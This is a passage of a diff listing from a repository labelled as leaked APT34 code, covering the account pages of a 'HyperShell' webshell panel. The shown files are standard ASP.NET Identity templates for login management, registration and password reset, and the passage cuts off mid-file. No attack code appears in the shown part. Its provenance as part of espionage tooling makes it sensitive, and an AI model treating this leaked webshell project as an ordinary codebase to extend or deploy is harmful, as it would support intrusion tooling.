/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Label PhoneNumber;
}
}

42
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManageLogins.aspx Normal file
View File

@@ -0,0 +1,42 @@
<%@ Page Title="" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="ManageLogins.aspx.cs" Inherits="HyperShell.Account.ManageLogins" %>
<%@ Register Src="~/Account/OpenAuthProviders.ascx" TagPrefix="uc" TagName="OpenAuthProviders" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2>Manage your external logins.</h2>
<asp:PlaceHolder runat="server" ID="successMessage" Visible="false" ViewStateMode="Disabled">
<p class="text-success"><%: SuccessMessage %></p>
</asp:PlaceHolder>
<div>
<section id="externalLoginsForm">
<asp:ListView runat="server"
ItemType="Microsoft.AspNet.Identity.UserLoginInfo"
SelectMethod="GetLogins" DeleteMethod="RemoveLogin" DataKeyNames="LoginProvider,ProviderKey">
<LayoutTemplate>
<h4>Registered Logins</h4>
<table class="table">
<tbody>
<tr runat="server" id="itemPlaceholder"></tr>
</tbody>
</table>
</LayoutTemplate>
<ItemTemplate>
<tr>
<td><%#: Item.LoginProvider %></td>
<td>
<asp:Button runat="server" Text="Remove" CommandName="Delete" CausesValidation="false"
ToolTip='<%# "Remove this " + Item.LoginProvider + " login from your account" %>'
Visible="<%# CanRemoveExternalLogins %>" CssClass="btn btn-default" />
</td>
</tr>
</ItemTemplate>
</asp:ListView>
</section>
</div>
<div>
<uc:OpenAuthProviders runat="server" ReturnUrl="~/Account/ManageLogins" />
</div>
</asp:Content>

62
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManageLogins.aspx.cs Normal file
View File

@@ -0,0 +1,62 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
namespace HyperShell.Account
{
public partial class ManageLogins : System.Web.UI.Page
{
protected string SuccessMessage
{
get;
private set;
}
protected bool CanRemoveExternalLogins
{
get;
private set;
}
private bool HasPassword(ApplicationUserManager manager)
{
return manager.HasPassword(User.Identity.GetUserId());
}
protected void Page_Load(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
CanRemoveExternalLogins = manager.GetLogins(User.Identity.GetUserId()).Count() > 1;
SuccessMessage = String.Empty;
successMessage.Visible = !String.IsNullOrEmpty(SuccessMessage);
}
public IEnumerable<UserLoginInfo> GetLogins()
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var accounts = manager.GetLogins(User.Identity.GetUserId());
CanRemoveExternalLogins = accounts.Count() > 1 || HasPassword(manager);
return accounts;
}
public void RemoveLogin(string loginProvider, string providerKey)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
var result = manager.RemoveLogin(User.Identity.GetUserId(), new UserLoginInfo(loginProvider, providerKey));
string msg = String.Empty;
if (result.Succeeded)
{
var user = manager.FindById(User.Identity.GetUserId());
signInManager.SignIn(user, isPersistent: false, rememberBrowser: false);
msg = "?m=RemoveLoginSuccess";
}
Response.Redirect("~/Account/ManageLogins" + msg);
}
}
}

24
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManageLogins.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,24 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class ManageLogins {
/// <summary>
/// successMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder successMessage;
}
}

93
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManagePassword.aspx Normal file
View File

@@ -0,0 +1,93 @@
<%@ Page Title="Manage Password" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="ManagePassword.aspx.cs" Inherits="HyperShell.Account.ManagePassword" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<div class="form-horizontal">
<section id="passwordForm">
<asp:PlaceHolder runat="server" ID="setPassword" Visible="false">
<p>
You do not have a local password for this site. Add a local
password so you can log in without an external login.
</p>
<div class="form-horizontal">
<h4>Set Password Form</h4>
<asp:ValidationSummary runat="server" ShowModelStateErrors="true" CssClass="text-danger" />
<hr />
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="password" CssClass="col-md-2 control-label">Password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="password" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="password"
CssClass="text-danger" ErrorMessage="The password field is required."
Display="Dynamic" ValidationGroup="SetPassword" />
<asp:ModelErrorMessage runat="server" ModelStateKey="NewPassword" AssociatedControlID="password"
CssClass="text-danger" SetFocusOnError="true" />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="confirmPassword" CssClass="col-md-2 control-label">Confirm password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="confirmPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="confirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The confirm password field is required."
ValidationGroup="SetPassword" />
<asp:CompareValidator runat="server" ControlToCompare="Password" ControlToValidate="confirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The password and confirmation password do not match."
ValidationGroup="SetPassword" />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" Text="Set Password" ValidationGroup="SetPassword" OnClick="SetPassword_Click" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:PlaceHolder>
<asp:PlaceHolder runat="server" ID="changePasswordHolder" Visible="false">
<div class="form-horizontal">
<h4>Change Password Form</h4>
<hr />
<asp:ValidationSummary runat="server" ShowModelStateErrors="true" CssClass="text-danger" />
<div class="form-group">
<asp:Label runat="server" ID="CurrentPasswordLabel" AssociatedControlID="CurrentPassword" CssClass="col-md-2 control-label">Current password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="CurrentPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="CurrentPassword"
CssClass="text-danger" ErrorMessage="The current password field is required."
ValidationGroup="ChangePassword" />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" ID="NewPasswordLabel" AssociatedControlID="NewPassword" CssClass="col-md-2 control-label">New password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="NewPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="NewPassword"
CssClass="text-danger" ErrorMessage="The new password is required."
ValidationGroup="ChangePassword" />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" ID="ConfirmNewPasswordLabel" AssociatedControlID="ConfirmNewPassword" CssClass="col-md-2 control-label">Confirm new password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="ConfirmNewPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="ConfirmNewPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="Confirm new password is required."
ValidationGroup="ChangePassword" />
<asp:CompareValidator runat="server" ControlToCompare="NewPassword" ControlToValidate="ConfirmNewPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The new password and confirmation password do not match."
ValidationGroup="ChangePassword" />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" Text="Change Password" ValidationGroup="ChangePassword" OnClick="ChangePassword_Click" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:PlaceHolder>
</section>
</div>
</asp:Content>

98
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManagePassword.aspx.cs Normal file
View File

@@ -0,0 +1,98 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
namespace HyperShell.Account
{
public partial class ManagePassword : System.Web.UI.Page
{
protected string SuccessMessage
{
get;
private set;
}
private bool HasPassword(ApplicationUserManager manager)
{
return manager.HasPassword(User.Identity.GetUserId());
}
protected void Page_Load(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
if (!IsPostBack)
{
// Determine the sections to render
if (HasPassword(manager))
{
changePasswordHolder.Visible = true;
}
else
{
setPassword.Visible = true;
changePasswordHolder.Visible = false;
}
// Render success message
var message = Request.QueryString["m"];
if (message != null)
{
// Strip the query string from action
Form.Action = ResolveUrl("~/Account/Manage");
}
}
}
protected void ChangePassword_Click(object sender, EventArgs e)
{
if (IsValid)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
IdentityResult result = manager.ChangePassword(User.Identity.GetUserId(), CurrentPassword.Text, NewPassword.Text);
if (result.Succeeded)
{
var user = manager.FindById(User.Identity.GetUserId());
signInManager.SignIn( user, isPersistent: false, rememberBrowser: false);
Response.Redirect("~/Account/Manage?m=ChangePwdSuccess");
}
else
{
AddErrors(result);
}
}
}
protected void SetPassword_Click(object sender, EventArgs e)
{
if (IsValid)
{
// Create the local login info and link the local account to the user
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
IdentityResult result = manager.AddPassword(User.Identity.GetUserId(), password.Text);
if (result.Succeeded)
{
Response.Redirect("~/Account/Manage?m=SetPwdSuccess");
}
else
{
AddErrors(result);
}
}
}
private void AddErrors(IdentityResult result)
{
foreach (var error in result.Errors)
{
ModelState.AddModelError("", error);
}
}
}
}

105
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ManagePassword.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,105 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class ManagePassword {
/// <summary>
/// setPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder setPassword;
/// <summary>
/// password control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox password;
/// <summary>
/// confirmPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox confirmPassword;
/// <summary>
/// changePasswordHolder control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder changePasswordHolder;
/// <summary>
/// CurrentPasswordLabel control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Label CurrentPasswordLabel;
/// <summary>
/// CurrentPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox CurrentPassword;
/// <summary>
/// NewPasswordLabel control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Label NewPasswordLabel;
/// <summary>
/// NewPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox NewPassword;
/// <summary>
/// ConfirmNewPasswordLabel control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Label ConfirmNewPasswordLabel;
/// <summary>
/// ConfirmNewPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox ConfirmNewPassword;
}
}

45
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Register.aspx Normal file
View File

@@ -0,0 +1,45 @@
<%@ Page Title="Register" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Register.aspx.cs" Inherits="HyperShell.Account.Register" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<p class="text-danger">
<asp:Literal runat="server" ID="ErrorMessage" />
</p>
<div class="form-horizontal">
<h4>Create a new account</h4>
<hr />
<asp:ValidationSummary runat="server" CssClass="text-danger" />
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Email" CssClass="col-md-2 control-label">Email</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Email" CssClass="form-control" TextMode="Email" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Email"
CssClass="text-danger" ErrorMessage="The email field is required." />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Password" CssClass="col-md-2 control-label">Password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Password" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Password"
CssClass="text-danger" ErrorMessage="The password field is required." />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="ConfirmPassword" CssClass="col-md-2 control-label">Confirm password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="ConfirmPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="ConfirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The confirm password field is required." />
<asp:CompareValidator runat="server" ControlToCompare="Password" ControlToValidate="ConfirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The password and confirmation password do not match." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="CreateUser_Click" Text="Register" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:Content>

36
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Register.aspx.cs Normal file
View File

@@ -0,0 +1,36 @@
using System;
using System.Linq;
using System.Web;
using System.Web.UI;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class Register : Page
{
protected void CreateUser_Click(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
var user = new ApplicationUser() { UserName = Email.Text, Email = Email.Text };
IdentityResult result = manager.Create(user, Password.Text);
if (result.Succeeded)
{
// For more information on how to enable account confirmation and password reset please visit http://go.microsoft.com/fwlink/?LinkID=320771
//string code = manager.GenerateEmailConfirmationToken(user.Id);
//string callbackUrl = IdentityHelper.GetUserConfirmationRedirectUrl(code, user.Id, Request);
//manager.SendEmail(user.Id, "Confirm your account", "Please confirm your account by clicking <a href=\"" + callbackUrl + "\">here</a>.");
signInManager.SignIn( user, isPersistent: false, rememberBrowser: false);
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
}
else
{
ErrorMessage.Text = result.Errors.FirstOrDefault();
}
}
}
}

51
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/Register.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,51 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class Register {
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal ErrorMessage;
/// <summary>
/// Email control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Email;
/// <summary>
/// Password control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Password;
/// <summary>
/// ConfirmPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox ConfirmPassword;
}
}

33
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/RegisterExternalLogin.aspx Normal file
View File

@@ -0,0 +1,33 @@
<%@ Page Title="Register an external login" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="RegisterExternalLogin.aspx.cs" Inherits="HyperShell.Account.RegisterExternalLogin" Async="true" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h3>Register with your <%: ProviderName %> account</h3>
<asp:PlaceHolder runat="server">
<div class="form-horizontal">
<h4>Association Form</h4>
<hr />
<asp:ValidationSummary runat="server" ShowModelStateErrors="true" CssClass="text-danger" />
<p class="text-info">
You've authenticated with <strong><%: ProviderName %></strong>. Please enter an email below for the current site
and click the Log in button.
</p>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="email" CssClass="col-md-2 control-label">Email</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="email" CssClass="form-control" TextMode="Email" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="email"
Display="Dynamic" CssClass="text-danger" ErrorMessage="Email is required" />
<asp:ModelErrorMessage runat="server" ModelStateKey="email" CssClass="text-error" />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" Text="Log in" CssClass="btn btn-default" OnClick="LogIn_Click" />
</div>
</div>
</div>
</asp:PlaceHolder>
</asp:Content>

130
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/RegisterExternalLogin.aspx.cs Normal file
View File

@@ -0,0 +1,130 @@
using System;
using System.Web;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Microsoft.Owin.Security;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class RegisterExternalLogin : System.Web.UI.Page
{
protected string ProviderName
{
get { return (string)ViewState["ProviderName"] ?? String.Empty; }
private set { ViewState["ProviderName"] = value; }
}
protected string ProviderAccountKey
{
get { return (string)ViewState["ProviderAccountKey"] ?? String.Empty; }
private set { ViewState["ProviderAccountKey"] = value; }
}
private void RedirectOnFail()
{
Response.Redirect((User.Identity.IsAuthenticated) ? "~/Account/Manage" : "~/Account/Login");
}
protected void Page_Load()
{
// Process the result from an auth provider in the request
ProviderName = IdentityHelper.GetProviderNameFromRequest(Request);
if (String.IsNullOrEmpty(ProviderName))
{
RedirectOnFail();
return;
}
if (!IsPostBack)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
var loginInfo = Context.GetOwinContext().Authentication.GetExternalLoginInfo();
if (loginInfo == null)
{
RedirectOnFail();
return;
}
var user = manager.Find(loginInfo.Login);
if (user != null)
{
signInManager.SignIn(user, isPersistent: false, rememberBrowser: false);
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
}
else if (User.Identity.IsAuthenticated)
{
// Apply Xsrf check when linking
var verifiedloginInfo = Context.GetOwinContext().Authentication.GetExternalLoginInfo(IdentityHelper.XsrfKey, User.Identity.GetUserId());
if (verifiedloginInfo == null)
{
RedirectOnFail();
return;
}
var result = manager.AddLogin(User.Identity.GetUserId(), verifiedloginInfo.Login);
if (result.Succeeded)
{
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
}
else
{
AddErrors(result);
return;
}
}
else
{
email.Text = loginInfo.Email;
}
}
}
protected void LogIn_Click(object sender, EventArgs e)
{
CreateAndLoginUser();
}
private void CreateAndLoginUser()
{
if (!IsValid)
{
return;
}
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().GetUserManager<ApplicationSignInManager>();
var user = new ApplicationUser() { UserName = email.Text, Email = email.Text };
IdentityResult result = manager.Create(user);
if (result.Succeeded)
{
var loginInfo = Context.GetOwinContext().Authentication.GetExternalLoginInfo();
if (loginInfo == null)
{
RedirectOnFail();
return;
}
result = manager.AddLogin(user.Id, loginInfo.Login);
if (result.Succeeded)
{
signInManager.SignIn(user, isPersistent: false, rememberBrowser: false);
// For more information on how to enable account confirmation and password reset please visit http://go.microsoft.com/fwlink/?LinkID=320771
// var code = manager.GenerateEmailConfirmationToken(user.Id);
// Send this link via email: IdentityHelper.GetUserConfirmationRedirectUrl(code, user.Id)
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
return;
}
}
AddErrors(result);
}
private void AddErrors(IdentityResult result)
{
foreach (var error in result.Errors)
{
ModelState.AddModelError("", error);
}
}
}
}

24
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/RegisterExternalLogin.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,24 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class RegisterExternalLogin {
/// <summary>
/// email control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox email;
}
}

45
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPassword.aspx Normal file
View File

@@ -0,0 +1,45 @@
<%@ Page Title="Reset Password" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="ResetPassword.aspx.cs" Inherits="HyperShell.Account.ResetPassword" Async="true" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<p class="text-danger">
<asp:Literal runat="server" ID="ErrorMessage" />
</p>
<div class="form-horizontal">
<h4>Enter your new password</h4>
<hr />
<asp:ValidationSummary runat="server" CssClass="text-danger" />
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Email" CssClass="col-md-2 control-label">Email</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Email" CssClass="form-control" TextMode="Email" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Email"
CssClass="text-danger" ErrorMessage="The email field is required." />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Password" CssClass="col-md-2 control-label">Password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Password" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Password"
CssClass="text-danger" ErrorMessage="The password field is required." />
</div>
</div>
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="ConfirmPassword" CssClass="col-md-2 control-label">Confirm password</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="ConfirmPassword" TextMode="Password" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="ConfirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The confirm password field is required." />
<asp:CompareValidator runat="server" ControlToCompare="Password" ControlToValidate="ConfirmPassword"
CssClass="text-danger" Display="Dynamic" ErrorMessage="The password and confirmation password do not match." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="Reset_Click" Text="Reset" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:Content>

46
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPassword.aspx.cs Normal file
View File

@@ -0,0 +1,46 @@
using System;
using System.Linq;
using System.Web;
using System.Web.UI;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class ResetPassword : Page
{
protected string StatusMessage
{
get;
private set;
}
protected void Reset_Click(object sender, EventArgs e)
{
string code = IdentityHelper.GetCodeFromRequest(Request);
if (code != null)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var user = manager.FindByName(Email.Text);
if (user == null)
{
ErrorMessage.Text = "No user found";
return;
}
var result = manager.ResetPassword(user.Id, code, Password.Text);
if (result.Succeeded)
{
Response.Redirect("~/Account/ResetPasswordConfirmation");
return;
}
ErrorMessage.Text = result.Errors.FirstOrDefault();
return;
}
ErrorMessage.Text = "An error has occurred";
}
}
}

51
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPassword.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,51 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class ResetPassword {
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal ErrorMessage;
/// <summary>
/// Email control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Email;
/// <summary>
/// Password control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Password;
/// <summary>
/// ConfirmPassword control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox ConfirmPassword;
}
}

8
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPasswordConfirmation.aspx Normal file
View File

@@ -0,0 +1,8 @@
<%@ Page Title="Password Changed" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="ResetPasswordConfirmation.aspx.cs" Inherits="HyperShell.Account.ResetPasswordConfirmation" Async="true" %>
<asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent">
<h2><%: Title %>.</h2>
<div>
<p>Your password has been changed. Click <asp:HyperLink ID="login" runat="server" NavigateUrl="~/Account/Login">here</asp:HyperLink> to login </p>
</div>
</asp:Content>

8
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPasswordConfirmation.aspx.cs Normal file
View File

@@ -0,0 +1,8 @@
using System.Web.UI;
namespace HyperShell.Account
{
public partial class ResetPasswordConfirmation : Page
{
}
}

24
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/ResetPasswordConfirmation.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,24 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class ResetPasswordConfirmation {
/// <summary>
/// login control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HyperLink login;
}
}

50
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/TwoFactorAuthenticationSignIn.aspx Normal file
View File

@@ -0,0 +1,50 @@
<%@ Page Title="Two-Factor Authentication" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="TwoFactorAuthenticationSignIn.aspx.cs" Inherits="HyperShell.Account.TwoFactorAuthenticationSignIn" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<asp:PlaceHolder runat="server" ID="sendcode">
<section>
<h4>Send verification code</h4>
<hr />
<div class="row">
<div class="col-md-12">
Select Two-Factor Authentication Provider:
<asp:DropDownList runat="server" ID="Providers">
</asp:DropDownList>
<asp:Button Text="Submit" ID="ProviderSubmit" OnClick="ProviderSubmit_Click" CssClass="btn btn-default" runat="server" />
</div>
</div>
</section>
</asp:PlaceHolder>
<asp:PlaceHolder runat="server" ID="verifycode" Visible="false">
<section>
<h4>Enter verification code</h4>
<hr />
<asp:HiddenField ID="SelectedProvider" runat="server" />
<asp:PlaceHolder runat="server" ID="ErrorMessage" Visible="false">
<p class="text-danger">
<asp:Literal runat="server" ID="FailureText" />
</p>
</asp:PlaceHolder>
<div class="form-group">
<asp:Label Text="Code:" runat="server" AssociatedControlID="Code" CssClass="col-md-2 control-label" />
<div class="col-md-10">
<asp:TextBox runat="server" ID="Code" CssClass="form-control" />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<div class="checkbox">
